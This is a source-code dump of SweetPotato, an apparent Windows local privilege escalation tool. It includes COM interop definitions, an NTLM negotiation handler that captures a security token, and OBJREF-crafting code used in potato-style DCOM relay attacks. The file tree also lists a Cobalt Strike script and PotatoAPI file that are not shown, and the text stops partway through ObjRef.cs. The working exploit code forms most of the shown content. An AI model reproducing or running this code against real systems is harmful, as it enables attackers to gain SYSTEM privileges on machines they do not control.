├── .gitattributes ├── .gitignore ├── Com ├── IEnumSTATSTG.cs ├── ILockBytes.cs ├── IMarshal.cs ├── IStorage.cs ├── IStream.cs └── Ole32.cs ├── LICENSE ├── LocalNegotiator.cs ├── ObjRef.cs ├── Options.cs ├── PotatoAPI.cs ├── Program.cs ├── Properties └── AssemblyInfo.cs ├── README.md ├── Security ├── Privilege.cs └── SSPIHelper.cs ├── StorageTrigger.cs ├── SweetPotato.cna ├── SweetPotato.csproj ├── SweetPotato.sln ├── app.config └── app.manifest /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | .DS_Store 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Aa][Rr][Mm]/ 27 | [Aa][Rr][Mm]64/ 28 | bld/ 29 | [Bb]in/ 30 | [Oo]bj/ 31 | [Ll]og/ 32 | [Ll]ogs/ 33 | 34 | # Visual Studio 2015/2017 cache/options directory 35 | .vs/ 36 | # Uncomment if you have tasks that create the project's static files in wwwroot 37 | #wwwroot/ 38 | 39 | # Visual Studio 2017 auto generated files 40 | Generated\ Files/ 41 | 42 | # MSTest test Results 43 | [Tt]est[Rr]esult*/ 44 | [Bb]uild[Ll]og.* 45 | 46 | # NUnit 47 | *.VisualState.xml 48 | TestResult.xml 49 | nunit-*.xml 50 | 51 | # Build Results of an ATL Project 52 | [Dd]ebugPS/ 53 | [Rr]eleasePS/ 54 | dlldata.c 55 | 56 | # Benchmark Results 57 | BenchmarkDotNet.Artifacts/ 58 | 59 | # .NET Core 60 | project.lock.json 61 | project.fragment.lock.json 62 | artifacts/ 63 | 64 | # StyleCop 65 | StyleCopReport.xml 66 | 67 | # Files built by Visual Studio 68 | *_i.c 69 | *_p.c 70 | *_h.h 71 | *.ilk 72 | *.meta 73 | *.obj 74 | *.iobj 75 | *.pch 76 | *.pdb 77 | *.ipdb 78 | *.pgc 79 | *.pgd 80 | *.rsp 81 | *.sbr 82 | *.tlb 83 | *.tli 84 | *.tlh 85 | *.tmp 86 | *.tmp_proj 87 | *_wpftmp.csproj 88 | *.log 89 | *.vspscc 90 | *.vssscc 91 | .builds 92 | *.pidb 93 | *.svclog 94 | *.scc 95 | 96 | # Chutzpah Test files 97 | _Chutzpah* 98 | 99 | # Visual C++ cache files 100 | ipch/ 101 | *.aps 102 | *.ncb 103 | *.opendb 104 | *.opensdf 105 | *.sdf 106 | *.cachefile 107 | *.VC.db 108 | *.VC.VC.opendb 109 | 110 | # Visual Studio profiler 111 | *.psess 112 | *.vsp 113 | *.vspx 114 | *.sap 115 | 116 | # Visual Studio Trace Files 117 | *.e2e 118 | 119 | # TFS 2012 Local Workspace 120 | $tf/ 121 | 122 | # Guidance Automation Toolkit 123 | *.gpState 124 | 125 | # ReSharper is a .NET coding add-in 126 | _ReSharper*/ 127 | *.[Rr]e[Ss]harper 128 | *.DotSettings.user 129 | 130 | # JustCode is a .NET coding add-in 131 | .JustCode 132 | 133 | # TeamCity is a build add-in 134 | _TeamCity* 135 | 136 | # DotCover is a Code Coverage Tool 137 | *.dotCover 138 | 139 | # AxoCover is a Code Coverage Tool 140 | .axoCover/* 141 | !.axoCover/settings.json 142 | 143 | # Visual Studio code coverage results 144 | *.coverage 145 | *.coveragexml 146 | 147 | # NCrunch 148 | _NCrunch_* 149 | .*crunch*.local.xml 150 | nCrunchTemp_* 151 | 152 | # MightyMoose 153 | *.mm.* 154 | AutoTest.Net/ 155 | 156 | # Web workbench (sass) 157 | .sass-cache/ 158 | 159 | # Installshield output folder 160 | [Ee]xpress/ 161 | 162 | # DocProject is a documentation generator add-in 163 | DocProject/buildhelp/ 164 | DocProject/Help/*.HxT 165 | DocProject/Help/*.HxC 166 | DocProject/Help/*.hhc 167 | DocProject/Help/*.hhk 168 | DocProject/Help/*.hhp 169 | DocProject/Help/Html2 170 | DocProject/Help/html 171 | 172 | # Click-Once directory 173 | publish/ 174 | 175 | # Publish Web Output 176 | *.[Pp]ublish.xml 177 | *.azurePubxml 178 | # Note: Comment the next line if you want to checkin your web deploy settings, 179 | # but database connection strings (with potential passwords) will be unencrypted 180 | *.pubxml 181 | *.publishproj 182 | 183 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 184 | # checkin your Azure Web App publish settings, but sensitive information contained 185 | # in these scripts will be unencrypted 186 | PublishScripts/ 187 | 188 | # NuGet Packages 189 | *.nupkg 190 | # NuGet Symbol Packages 191 | *.snupkg 192 | # The packages folder can be ignored because of Package Restore 193 | **/[Pp]ackages/* 194 | # except build/, which is used as an MSBuild target. 195 | !**/[Pp]ackages/build/ 196 | # Uncomment if necessary however generally it will be regenerated when needed 197 | #!**/[Pp]ackages/repositories.config 198 | # NuGet v3's project.json files produces more ignorable files 199 | *.nuget.props 200 | *.nuget.targets 201 | 202 | # Microsoft Azure Build Output 203 | csx/ 204 | *.build.csdef 205 | 206 | # Microsoft Azure Emulator 207 | ecf/ 208 | rcf/ 209 | 210 | # Windows Store app package directories and files 211 | AppPackages/ 212 | BundleArtifacts/ 213 | Package.StoreAssociation.xml 214 | _pkginfo.txt 215 | *.appx 216 | *.appxbundle 217 | *.appxupload 218 | 219 | # Visual Studio cache files 220 | # files ending in .cache can be ignored 221 | *.[Cc]ache 222 | # but keep track of directories ending in .cache 223 | !?*.[Cc]ache/ 224 | 225 | # Others 226 | ClientBin/ 227 | ~$* 228 | *~ 229 | *.dbmdl 230 | *.dbproj.schemaview 231 | *.jfm 232 | *.pfx 233 | *.publishsettings 234 | orleans.codegen.cs 235 | 236 | # Including strong name files can present a security risk 237 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 238 | #*.snk 239 | 240 | # Since there are multiple workflows, uncomment next line to ignore bower_components 241 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 242 | #bower_components/ 243 | 244 | # RIA/Silverlight projects 245 | Generated_Code/ 246 | 247 | # Backup & report files from converting an old project file 248 | # to a newer Visual Studio version. Backup files are not needed, 249 | # because we have git ;-) 250 | _UpgradeReport_Files/ 251 | Backup*/ 252 | UpgradeLog*.XML 253 | UpgradeLog*.htm 254 | ServiceFabricBackup/ 255 | *.rptproj.bak 256 | 257 | # SQL Server files 258 | *.mdf 259 | *.ldf 260 | *.ndf 261 | 262 | # Business Intelligence projects 263 | *.rdl.data 264 | *.bim.layout 265 | *.bim_*.settings 266 | *.rptproj.rsuser 267 | *- [Bb]ackup.rdl 268 | *- [Bb]ackup ([0-9]).rdl 269 | *- [Bb]ackup ([0-9][0-9]).rdl 270 | 271 | # Microsoft Fakes 272 | FakesAssemblies/ 273 | 274 | # GhostDoc plugin setting file 275 | *.GhostDoc.xml 276 | 277 | # Node.js Tools for Visual Studio 278 | .ntvs_analysis.dat 279 | node_modules/ 280 | 281 | # Visual Studio 6 build log 282 | *.plg 283 | 284 | # Visual Studio 6 workspace options file 285 | *.opt 286 | 287 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 288 | *.vbw 289 | 290 | # Visual Studio LightSwitch build output 291 | **/*.HTMLClient/GeneratedArtifacts 292 | **/*.DesktopClient/GeneratedArtifacts 293 | **/*.DesktopClient/ModelManifest.xml 294 | **/*.Server/GeneratedArtifacts 295 | **/*.Server/ModelManifest.xml 296 | _Pvt_Extensions 297 | 298 | # Paket dependency manager 299 | .paket/paket.exe 300 | paket-files/ 301 | 302 | # FAKE - F# Make 303 | .fake/ 304 | 305 | # CodeRush personal settings 306 | .cr/personal 307 | 308 | # Python Tools for Visual Studio (PTVS) 309 | __pycache__/ 310 | *.pyc 311 | 312 | # Cake - Uncomment if you are using it 313 | # tools/** 314 | # !tools/packages.config 315 | 316 | # Tabs Studio 317 | *.tss 318 | 319 | # Telerik's JustMock configuration file 320 | *.jmconfig 321 | 322 | # BizTalk build output 323 | *.btp.cs 324 | *.btm.cs 325 | *.odx.cs 326 | *.xsd.cs 327 | 328 | # OpenCover UI analysis results 329 | OpenCover/ 330 | 331 | # Azure Stream Analytics local run output 332 | ASALocalRun/ 333 | 334 | # MSBuild Binary and Structured Log 335 | *.binlog 336 | 337 | # NVidia Nsight GPU debugger configuration file 338 | *.nvuser 339 | 340 | # MFractors (Xamarin productivity tool) working folder 341 | .mfractor/ 342 | 343 | # Local History for Visual Studio 344 | .localhistory/ 345 | 346 | # BeatPulse healthcheck temp database 347 | healthchecksdb 348 | 349 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 350 | MigrationBackup/ 351 | 352 | # Ionide (cross platform F# VS Code tools) working folder 353 | .ionide/ 354 | -------------------------------------------------------------------------------- /Com/IEnumSTATSTG.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace SweetPotato { 5 | [ComImport] 6 | [Guid("0000000d-0000-0000-C000-000000000046")] 7 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] 8 | public interface IEnumSTATSTG { 9 | // The user needs to allocate an STATSTG array whose size is celt. 10 | [PreserveSig] 11 | uint 12 | Next(uint celt, [MarshalAs(UnmanagedType.LPArray), Out] STATSTG[] rgelt, out uint pceltFetched); 13 | 14 | void Skip(uint celt); 15 | 16 | void Reset(); 17 | 18 | [return: MarshalAs(UnmanagedType.Interface)] 19 | IEnumSTATSTG Clone(); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Com/ILockBytes.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace SweetPotato { 5 | [ComVisible(false)] 6 | [ComImport, InterfaceType(ComInterfaceType.InterfaceIsIUnknown), Guid("0000000A-0000-0000-C000-000000000046")] 7 | public interface ILockBytes { 8 | //Note: These two by(reference 32-bit integers (ULONG) could be used as return values instead, 9 | // but they are not tagged [retval] in the IDL, so for consitency's sake... 10 | void ReadAt(long ulOffset, System.IntPtr pv, int cb, out System.UInt32 pcbRead); 11 | void WriteAt(long ulOffset, System.IntPtr pv, int cb, out System.UInt32 pcbWritten); 12 | void Flush(); 13 | void SetSize(long cb); 14 | void LockRegion(long libOffset, long cb, int dwLockType); 15 | void UnlockRegion(long libOffset, long cb, int dwLockType); 16 | void Stat(out System.Runtime.InteropServices.STATSTG pstatstg, int grfStatFlag); 17 | 18 | } 19 | 20 | 21 | } 22 | -------------------------------------------------------------------------------- /Com/IMarshal.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace SweetPotato { 5 | 6 | [Guid("00000003-0000-0000-C000-000000000046")] 7 | [InterfaceType(1)] 8 | [ComConversionLoss] 9 | [ComImport] 10 | public interface IMarshal { 11 | 12 | void GetUnmarshalClass([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out Guid pCid); 13 | void GetMarshalSizeMax([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out uint pSize); 14 | void MarshalInterface([MarshalAs(28)] [In] IStream pstm, [In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS); 15 | void UnmarshalInterface([MarshalAs(28)] [In] IStream pstm, [In] ref Guid riid, out IntPtr ppv); 16 | void ReleaseMarshalData([MarshalAs(28)] [In] IStream pstm); 17 | void DisconnectObject([In] uint dwReserved); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /Com/IStorage.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace SweetPotato { 5 | 6 | [InterfaceType(1)] 7 | [ComConversionLoss] 8 | [Guid("0000000B-0000-0000-C000-000000000046")] 9 | [ComImport] 10 | public interface IStorage { 11 | void CreateStream([MarshalAs(21)] [In] string pwcsName, [In] uint grfMode, [In] uint reserved1, [In] uint reserved2, [MarshalAs(28)] out IStream ppstm); 12 | void OpenStream([MarshalAs(21)] [In] string pwcsName, [In] IntPtr reserved1, [In] uint grfMode, [In] uint reserved2, [MarshalAs(28)] out IStream ppstm); 13 | void CreateStorage([MarshalAs(21)] [In] string pwcsName, [In] uint grfMode, [In] uint reserved1, [In] uint reserved2, [MarshalAs(28)] out IStorage ppstg); 14 | void OpenStorage([MarshalAs(21)] [In] string pwcsName, [MarshalAs(28)] [In] IStorage pstgPriority, [In] uint grfMode, [In] IntPtr snbExclude, [In] uint reserved, [MarshalAs(28)] out IStorage ppstg); 15 | void CopyTo([In] uint ciidExclude, [MarshalAs(42, SizeParamIndex = 0)] [In] Guid[] rgiidExclude, [In] IntPtr snbExclude, [MarshalAs(28)] [In] IStorage pstgDest); 16 | void MoveElementTo([MarshalAs(21)] [In] string pwcsName, [MarshalAs(28)] [In] IStorage pstgDest, [MarshalAs(21)] [In] string pwcsNewName, [In] uint grfFlags); 17 | void Commit([In] uint grfCommitFlags); 18 | void Revert(); 19 | void EnumElements([In] uint reserved1, [In] IntPtr reserved2, [In] uint reserved3, [MarshalAs(28)] out IEnumSTATSTG ppEnum); 20 | void DestroyElement([MarshalAs(21)] [In] string pwcsName); 21 | void RenameElement([MarshalAs(21)] [In] string pwcsOldName, [MarshalAs(21)] [In] string pwcsNewName); 22 | void SetElementTimes([MarshalAs(21)] [In] string pwcsName, [MarshalAs(42)] [In] FILETIME[] pctime, [MarshalAs(42)] [In] FILETIME[] patime, [MarshalAs(42)] [In] FILETIME[] pmtime); 23 | void SetClass([In] ref Guid clsid); 24 | void SetStateBits([In] uint grfStateBits, [In] uint grfMask); 25 | void Stat([MarshalAs(42)] [Out] STATSTG[] pstatstg, [In] uint grfStatFlag); 26 | } 27 | } 28 | 29 | -------------------------------------------------------------------------------- /Com/IStream.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace SweetPotato { 5 | [ComImport, Guid("0000000c-0000-0000-C000-000000000046"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] 6 | public interface IStream { 7 | void Read([Out, MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 1)] byte[] pv, uint cb, out uint pcbRead); 8 | void Write([MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 1)] byte[] pv, uint cb, out uint pcbWritten); 9 | void Seek(long dlibMove, uint dwOrigin, out long plibNewPosition); 10 | void SetSize(long libNewSize); 11 | void CopyTo(IStream pstm, long cb, out long pcbRead, out long pcbWritten); 12 | void Commit(uint grfCommitFlags); 13 | void Revert(); 14 | void LockRegion(long libOffset, long cb, uint dwLockType); 15 | void UnlockRegion(long libOffset, long cb, uint dwLockType); 16 | void Stat(out STATSTG pstatstg, uint grfStatFlag); 17 | void Clone(out IStream ppstm); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /Com/Ole32.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace SweetPotato { 5 | public static class Ole32 { 6 | 7 | [Flags] 8 | public enum CLSCTX : uint { 9 | CLSCTX_INPROC_SERVER = 0x1, 10 | CLSCTX_INPROC_HANDLER = 0x2, 11 | CLSCTX_LOCAL_SERVER = 0x4, 12 | CLSCTX_INPROC_SERVER16 = 0x8, 13 | CLSCTX_REMOTE_SERVER = 0x10, 14 | CLSCTX_INPROC_HANDLER16 = 0x20, 15 | CLSCTX_RESERVED1 = 0x40, 16 | CLSCTX_RESERVED2 = 0x80, 17 | CLSCTX_RESERVED3 = 0x100, 18 | CLSCTX_RESERVED4 = 0x200, 19 | CLSCTX_NO_CODE_DOWNLOAD = 0x400, 20 | CLSCTX_RESERVED5 = 0x800, 21 | CLSCTX_NO_CUSTOM_MARSHAL = 0x1000, 22 | CLSCTX_ENABLE_CODE_DOWNLOAD = 0x2000, 23 | CLSCTX_NO_FAILURE_LOG = 0x4000, 24 | CLSCTX_DISABLE_AAA = 0x8000, 25 | CLSCTX_ENABLE_AAA = 0x10000, 26 | CLSCTX_FROM_DEFAULT_CONTEXT = 0x20000, 27 | CLSCTX_ACTIVATE_32_BIT_SERVER = 0x40000, 28 | CLSCTX_ACTIVATE_64_BIT_SERVER = 0x80000, 29 | CLSCTX_INPROC = CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, 30 | CLSCTX_SERVER = CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_REMOTE_SERVER, 31 | CLSCTX_ALL = CLSCTX_SERVER | CLSCTX_INPROC_HANDLER 32 | } 33 | 34 | [Flags] 35 | public enum STGM : int { 36 | DIRECT = 0x00000000, 37 | TRANSACTED = 0x00010000, 38 | SIMPLE = 0x08000000, 39 | READ = 0x00000000, 40 | WRITE = 0x00000001, 41 | READWRITE = 0x00000002, 42 | SHARE_DENY_NONE = 0x00000040, 43 | SHARE_DENY_READ = 0x00000030, 44 | SHARE_DENY_WRITE = 0x00000020, 45 | SHARE_EXCLUSIVE = 0x00000010, 46 | PRIORITY = 0x00040000, 47 | DELETEONRELEASE = 0x04000000, 48 | NOSCRATCH = 0x00100000, 49 | CREATE = 0x00001000, 50 | CONVERT = 0x00020000, 51 | FAILIFTHERE = 0x00000000, 52 | NOSNAPSHOT = 0x00200000, 53 | DIRECT_SWMR = 0x00400000, 54 | } 55 | 56 | public static IntPtr GuidToPointer(Guid g) { 57 | IntPtr ret = Marshal.AllocCoTaskMem(16); 58 | Marshal.Copy(g.ToByteArray(), 0, ret, 16); 59 | return ret; 60 | } 61 | 62 | public static Guid IID_IUnknown = new Guid("{00000000-0000-0000-C000-000000000046}"); 63 | public static IntPtr IID_IUnknownPtr = GuidToPointer(IID_IUnknown); 64 | 65 | [StructLayout(LayoutKind.Sequential)] 66 | public struct MULTI_QI { 67 | public IntPtr pIID; 68 | [MarshalAs(UnmanagedType.Interface)] 69 | public object pItf; 70 | public int hr; 71 | } 72 | 73 | [StructLayout(LayoutKind.Sequential)] 74 | public class COSERVERINFO { 75 | public uint dwReserved1; 76 | [MarshalAs(UnmanagedType.LPWStr)] 77 | public string pwszName; 78 | public IntPtr pAuthInfo; 79 | public uint dwReserved2; 80 | } 81 | 82 | [DllImport("ole32.dll", PreserveSig = false, ExactSpelling = true)] 83 | public static extern int CreateILockBytesOnHGlobal( 84 | IntPtr hGlobal, 85 | [MarshalAs(UnmanagedType.Bool)] bool fDeleteOnRelease, 86 | out ILockBytes ppLkbyt); 87 | 88 | [DllImport("ole32.dll", PreserveSig = false, ExactSpelling = true)] 89 | public static extern int StgCreateDocfileOnILockBytes( 90 | ILockBytes plkbyt, 91 | STGM grfMode, 92 | uint reserved, 93 | out IStorage ppstgOpen); 94 | 95 | [DllImport("ole32.dll", PreserveSig = false, ExactSpelling = true)] 96 | public static extern int CoGetInstanceFromIStorage(COSERVERINFO pServerInfo, ref Guid pclsid, 97 | [MarshalAs(UnmanagedType.IUnknown)] object pUnkOuter, CLSCTX dwClsCtx, 98 | IStorage pstg, uint cmq, [In, Out] MULTI_QI[] rgmqResults); 99 | } 100 | } 101 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 CCob 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /LocalNegotiator.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using static SweetPotato.SSPIHelper; 3 | 4 | namespace SweetPotato { 5 | 6 | public class LocalNegotiator { 7 | 8 | const int ASC_REQ_ALLOCATE_MEMORY = 0x00000100; 9 | const int ASC_REQ_CONNECTION = 0x00000800; 10 | 11 | CtxHandle phContext = new CtxHandle(); 12 | CredHandle hCred = new CredHandle(); 13 | SecBufferDesc secServerBufferDesc; 14 | 15 | public bool Authenticated { get; private set; } = false; 16 | public IntPtr Token { get; private set; } = IntPtr.Zero; 17 | 18 | public byte[] Challenge { get { 19 | return secServerBufferDesc.GetSecBuffer().GetBytes(); 20 | } 21 | } 22 | 23 | public int HandleType1(byte[] ntmlBytes) { 24 | 25 | TimeStamp ts = new TimeStamp(); 26 | 27 | int status = AcquireCredentialsHandle(null, "Negotiate", SECPKG_CRED_INBOUND, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, hCred, ts); 28 | 29 | if (status != SEC_E_OK) { 30 | Console.WriteLine("Error in AquireCredentialsHandle"); 31 | return -1; 32 | } 33 | 34 | SecBufferDesc secClientBufferDesc = new SecBufferDesc(ntmlBytes); 35 | secServerBufferDesc = new SecBufferDesc(256); 36 | 37 | UInt32 fContextAttr; 38 | 39 | return AcceptSecurityContext(hCred, null, ref secClientBufferDesc, ASC_REQ_CONNECTION, 40 | SECURITY_NATIVE_DREP, phContext, out secServerBufferDesc, out fContextAttr, ts); 41 | } 42 | 43 | public int HandleType2(byte[] ntlmBytes) { 44 | 45 | SecBuffer secBuffer = secServerBufferDesc.GetSecBuffer(); 46 | byte[] newNtlmBytes = secBuffer.GetBytes(); 47 | 48 | if (ntlmBytes.Length >= newNtlmBytes.Length) { 49 | for (int idx = 0; idx < ntlmBytes.Length; ++idx) { 50 | if (idx < newNtlmBytes.Length) { 51 | ntlmBytes[idx] = newNtlmBytes[idx]; 52 | } else { 53 | ntlmBytes[idx] = 0; 54 | } 55 | } 56 | } else { 57 | Console.WriteLine("NTLM Type2 cannot be replaced. New buffer too big"); 58 | } 59 | 60 | return 0; 61 | } 62 | 63 | public int HandleType3(byte[] ntmlBytes) { 64 | 65 | SecBufferDesc secClientBufferDesc = new SecBufferDesc(ntmlBytes); 66 | secServerBufferDesc = new SecBufferDesc(0); 67 | CtxHandle phContextNew = new CtxHandle(); 68 | 69 | UInt32 fContextAttr; 70 | TimeStamp ts = new TimeStamp(); 71 | 72 | int status = AcceptSecurityContext(hCred, phContext, ref secClientBufferDesc, ASC_REQ_ALLOCATE_MEMORY | ASC_REQ_CONNECTION, 73 | SECURITY_NATIVE_DREP, phContext, out secServerBufferDesc, out fContextAttr, ts); 74 | 75 | if (status == 0) { 76 | Authenticated = true; 77 | IntPtr hToken; 78 | if ((status = QuerySecurityContextToken(phContext, out hToken)) == 0) { 79 | Token = hToken; 80 | } 81 | } 82 | 83 | return status; 84 | } 85 | } 86 | } 87 | -------------------------------------------------------------------------------- /ObjRef.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using System.Text; 4 | 5 | namespace SweetPotato { 6 | 7 | public enum TowerProtocol : ushort { 8 | EPM_PROTOCOL_DNET_NSP = 0x04, 9 | EPM_PROTOCOL_OSI_TP4 = 0x05, 10 | EPM_PROTOCOL_OSI_CLNS = 0x06, 11 | EPM_PROTOCOL_TCP = 0x07, 12 | EPM_PROTOCOL_UDP = 0x08, 13 | EPM_PROTOCOL_IP = 0x09, 14 | EPM_PROTOCOL_NCADG = 0x0a, /* Connectionless RPC */ 15 | EPM_PROTOCOL_NCACN = 0x0b, 16 | EPM_PROTOCOL_NCALRPC = 0x0c, /* Local RPC */ 17 | EPM_PROTOCOL_UUID = 0x0d, 18 | EPM_PROTOCOL_IPX = 0x0e, 19 | EPM_PROTOCOL_SMB = 0x0f, 20 | EPM_PROTOCOL_NAMED_PIPE = 0x10, 21 | EPM_PROTOCOL_NETBIOS = 0x11, 22 | EPM_PROTOCOL_NETBEUI = 0x12, 23 | EPM_PROTOCOL_SPX = 0x13, 24 | EPM_PROTOCOL_NB_IPX = 0x14, /* NetBIOS over IPX */ 25 | EPM_PROTOCOL_DSP = 0x16, /* AppleTalk Data Stream Protocol */ 26 | EPM_PROTOCOL_DDP = 0x17, /* AppleTalk Data Datagram Protocol */ 27 | EPM_PROTOCOL_APPLETALK = 0x18, /* AppleTalk */ 28 | EPM_PROTOCOL_VINES_SPP = 0x1a, 29 | EPM_PROTOCOL_VINES_IPC = 0x1b, /* Inter Process Communication */ 30 | EPM_PROTOCOL_STREETTALK = 0x1c, /* Vines Streettalk */ 31 | EPM_PROTOCOL_HTTP = 0x1f, 32 | EPM_PROTOCOL_UNIX_DS = 0x20, /* Unix domain socket */ 33 | EPM_PROTOCOL_NULL = 0x21 34 | } 35 | 36 | public class ObjRef { 37 | 38 | [Flags] 39 | enum Type : uint { 40 | Standard = 0x1, 41 | Handler = 0x2, 42 | Custom = 0x4 43 | } 44 | 45 | const uint Signature = 0x574f454d; 46 | public readonly Guid Guid; 47 | public readonly Standard StandardObjRef; 48 | 49 | public ObjRef(Guid guid, Standard standardObjRef) { 50 | Guid = guid; 51 | StandardObjRef = standardObjRef; 52 | } 53 | 54 | public ObjRef(byte[] objRefBytes) { 55 | 56 | BinaryReader br = new BinaryReader(new MemoryStream(objRefBytes), Encoding.Unicode); 57 | 58 | if (br.ReadUInt32() != Signature) { 59 | throw new InvalidDataException("Does not look like an OBJREF stream"); 60 | } 61 | 62 | uint flags = br.ReadUInt32(); 63 | Guid = new Guid(br.ReadBytes(16)); 64 | 65 | if ((Type)flags == Type.Standard) { 66 | StandardObjRef = new Standard(br); 67 | } 68 | } 69 | 70 | public byte[] GetBytes() { 71 | BinaryWriter bw = new BinaryWriter(new MemoryStream()); 72 | 73 | bw.Write(Signature); 74 | bw.Write((uint)1); 75 | bw.Write(Guid.ToByteArray()); 76 | 77 | StandardObjRef.Save(bw); 78 | 79 | return ((MemoryStream)bw.BaseStream).ToArray(); 80 | } 81 | 82 | public class SecurityBinding { 83 | 84 | public readonly ushort AuthnSvc; 85 | public readonly ushort AuthzSvc; 86 | public readonly string PrincipalName; 87 | 88 | public SecurityBinding(ushort authnSvc, ushort authzSnc, string principalName) { 89 | AuthnSvc = authnSvc; 90 | AuthzSvc = authzSnc; 91 | PrincipalName = principalName; 92 | } 93 | 94 | public SecurityBinding(BinaryReader br) { 95 | 96 | AuthnSvc = br.ReadUInt16(); 97 | AuthzSvc = br.ReadUInt16(); 98 | char character; 99 | string principalName = ""; 100 | 101 | while ((character = br.ReadChar()) != 0) { 102 | principalName += character; 103 | } 104 | 105 | br.ReadChar(); 106 | } 107 | 108 | 109 | public byte[] GetBytes() { 110 | BinaryWriter bw = new BinaryWriter(new MemoryStream(), Encoding.Unicode); 111 | 112 | bw.Write(AuthnSvc); 113 | bw.Write(AuthzSvc); 114 | 115 | if (PrincipalName != null && PrincipalName.Length > 0) 116 | bw.Write(Encoding.Unicode.GetBytes(PrincipalName)); 117 | 118 | bw.Write((char)0); 119 | bw.Write((char)0); 120 | 121 | return ((MemoryStream)bw.BaseStream).ToArray(); 122 | } 123 | } 124 | 125 | public class StringBinding { 126 | public readonly TowerProtocol TowerID; 127 | public readonly string NetworkAddress; 128 | 129 | public StringBinding(TowerProtocol towerID, string networkAddress) { 130 | TowerID = towerID; 131 | NetworkAddress = networkAddress; 132 | } 133 | 134 | public StringBinding(BinaryReader br) { 135 | TowerID = (TowerProtocol)br.ReadUInt16(); 136 | char character; 137 | string networkAddress = ""; 138 | 139 | while ((character = br.ReadChar()) != 0) { 140 | networkAddress += character; 141 | } 142 | 143 | br.ReadChar(); 144 | NetworkAddress = networkAddress; 145 | } 146 | 147 | internal byte[] GetBytes() { 148 | BinaryWriter bw = new BinaryWriter(new MemoryStream(), Encoding.Unicode); 149 | 150 | bw.Write((ushort)TowerID); 151 | bw.Write(Encoding.Unicode.GetBytes(NetworkAddress)); 152 | bw.Write((char)0); 153 | bw.Write((char)0); 154 | 155 | return ((MemoryStream)bw.BaseStream).ToArray(); 156 | } 157 | } 158 | 159 | public class DualStringArray { 160 | private readonly ushort NumEntries; 161 | private readonly ushort SecurityOffset; 162 | public readonly StringBinding StringBinding; 163 | public readonly SecurityBinding SecurityBinding; 164 | 165 | public DualStringArray(StringBinding stringBinding, SecurityBinding securityBinding) { 166 | NumEntries = (ushort)((stringBinding.GetBytes().Length + securityBinding.GetBytes().Length) / 2); 167 | SecurityOffset = (ushort)(stringBinding.GetBytes().Length / 2); 168 | 169 | StringBinding = stringBinding; 170 | SecurityBinding = securityBinding; 171 | } 172 | 173 | public DualStringArray(BinaryReader br) { 174 | NumEntries = br.ReadUInt16(); 175 | SecurityOffset = br.ReadUInt16(); 176 | 177 | StringBinding = new StringBinding(br); 178 | SecurityBinding = new SecurityBinding(br); 179 | } 180 